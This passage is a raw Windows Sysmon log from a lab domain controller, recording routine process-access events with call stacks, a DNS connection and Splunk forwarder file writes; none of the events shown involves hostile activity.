12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000007456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 354300x80000000000000007754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.324{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61767- 23542300x80000000000000007753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.459{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BEB32DE17C8122B4AEC33B2C658A7AA,SHA256=EFCBE14FE1D21310208267658C2AB13E56742FE0586AC1807E64CC12254D5E02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.443{266CAFBE-647D-6064-3300-00000000AE01}25203396C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000007751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.443{266CAFBE-647D-6064-3300-00000000AE01}25203396C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.428{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.428{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.428{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.428{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000007755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:38.472{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F06E8F836521C21771D545903E2241D,SHA256=3EDACF8E57EB4F40F50531F7E859B8CCCCD84D5394F0E4AEA00EC47ED0EE08E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:39.484{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B057436143B7949ECE487BD60519E12,SHA256=2D0FDC49953B7E153FDA2DBD7E74746A2C4DC240C280921FFCAD1BE56B92BA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:40.528{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=657C0E35DF19C8B8E5BEBFDA3904420E,SHA256=A71C553D481BB21D40DEC62E25622FE7EAA9E5533E9CB9740C4D02C8061B52DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.822{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.822{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.806{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.806{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1200_POS4.jpgMD5=1E7D614892552BF17B2B08D30138EF64,SHA256=E37824373B3B7BA11537E7C32F933972B521C1FAF75D9A9585030F8DDDEFB304,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.806{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.806{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.806{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.541{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=209FB22AEB02414DB3C7F5028792CD2E,SHA256=CE41A2E6F479375B33824687AD8F5C256B821C143296A20682EC776C24A7C7E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\shell32.dll+a918a|C:\Windows\System32\shell32.dll+db0a2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\shell32.dll+a90f4|C:\Windows\System32\shell32.dll+db0a2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+a90d6|C:\Windows\System32\shell32.dll+db0a2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+a90d6|C:\Windows\System32\shell32.dll+db0a2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\shell32.dll+4b1fa|C:\Windows\System32\shell32.dll+db374|C:\Windows\System32\shell32.dll+dafc8|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 